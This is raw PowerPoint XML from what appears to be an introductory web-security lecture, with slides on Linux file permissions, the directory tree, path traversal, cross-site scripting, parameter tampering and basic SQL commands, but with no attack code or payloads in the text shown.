              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="203200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="203200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="448" name="Shape 44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pic>
        <p:nvPicPr>
          <p:cNvPr descr="cd.JPG" id="449" name="Shape 449"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="980950" y="4790400"/>
            <a:ext cx="6267600" cy="1243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54" name="Shape 454"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="Shape 455"/>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File System Permissions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="456" name="Shape 456"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1417650"/>
            <a:ext cx="8369100" cy="4893600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Permissions for files and folders in linux can be expressed in terms of </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1117600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>r - read	w - write 	x - execute </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1117600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>or no permissions. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Permissions can pertain to the owner, a group, and others. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> Example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>rwx-r-- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="254000" lvl="0" marL="1574800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>owner can read, write, and execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="254000" lvl="0" marL="1574800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>group can read</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="254000" lvl="0" marL="1574800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>others have no permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="203200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="203200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="Shape 457"/>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Shape 463"/>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Tree Structure in Linux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="Shape 464"/>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65" name="Shape 46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pic>
        <p:nvPicPr>
          <p:cNvPr id="466" name="Shape 466"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="35125"/>
            <a:ext cx="9144000" cy="6822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i="0" lang="en-US" sz="4400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Topics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Shape 122"/>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rgbClr val="FFFF00"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Crash</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>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Parameter Tampering</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rgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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chemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Cross Site Scripting (XSS)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Shape 472"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="198438"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Path Traversal Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="473" name="Shape 473"/>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74" name="Shape 47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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="475" name="Shape 475"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1638300" y="1017800"/>
            <a:ext cx="6106400" cy="5478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Shape 481"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="198438"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Path Traversal Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="Shape 482"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1165950"/>
            <a:ext cx="8229600" cy="5007900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Shape 48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484" name="Shape 484"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1081925"/>
            <a:ext cx="9144000" cy="5182750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="Shape 485"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2166150" y="1519625"/>
            <a:ext cx="4811700" cy="6561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Shape 491"/>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i="0" lang="en-US" sz="4400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Topics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Shape 492"/>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Crash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Parameter Tampering</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rgbClr val="FFFF00"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>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chemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Cross Site Scripting (XSS)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Shape 49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499" name="Shape 499"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="328613" y="695325"/>
            <a:ext cx="2162175" cy="3028950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="500" name="Shape 500"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5663931" y="193975"/>
            <a:ext cx="2962643" cy="2719825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="501" name="Shape 501"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5663925" y="3945323"/>
            <a:ext cx="2720225" cy="2506191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="502" name="Shape 502"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2469575" y="1143000"/>
            <a:ext cx="3189900" cy="10500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="503" name="Shape 503"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2968350" y="767700"/>
            <a:ext cx="1953600" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1800"/>
              <a:t>GET / HTTP/1.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="504" name="Shape 504"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7623500" y="1339150"/>
            <a:ext cx="1666000" cy="1103875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="505" name="Shape 505"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6283025" y="2815925"/>
            <a:ext cx="10500" cy="1527600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="506" name="Shape 506"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6563600" y="2815925"/>
            <a:ext cx="0" cy="1485900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="507" name="Shape 507"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2500775" y="1880750"/>
            <a:ext cx="3169200" cy="20700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="Shape 508"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3037625" y="1880750"/>
            <a:ext cx="2216700" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1800"/>
              <a:t>HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="509" name="Shape 509"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4146400" y="1339162"/>
            <a:ext cx="1666000" cy="1103875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="510" name="Shape 510"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880775" y="1339175"/>
            <a:ext cx="1666000" cy="110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par>
                          <p:cTn fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn fill="hold" nodeType="afterEffect" presetClass="exit" presetID="10" presetSubtype="0">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect filter="fade" transition="out">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="504"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1000"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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par>
                          <p:cTn fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn fill="hold" nodeType="afterEffect" presetClass="exit" presetID="10" presetSubtype="0">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect filter="fade" transition="out">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="509"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1000"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="50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Shape 515"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="Shape 516"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4525963"/>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lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>SQL (Structured Query Language) is a common database framework used by web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="520"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Basic commands:</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CREATE – make a new entry in the database</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INSERT – put new data into a table</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UPDATE – modify existing records</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DELETE – remove an entry from the database</a:t>
            </a:r>
          </a:p>
          <a:p>
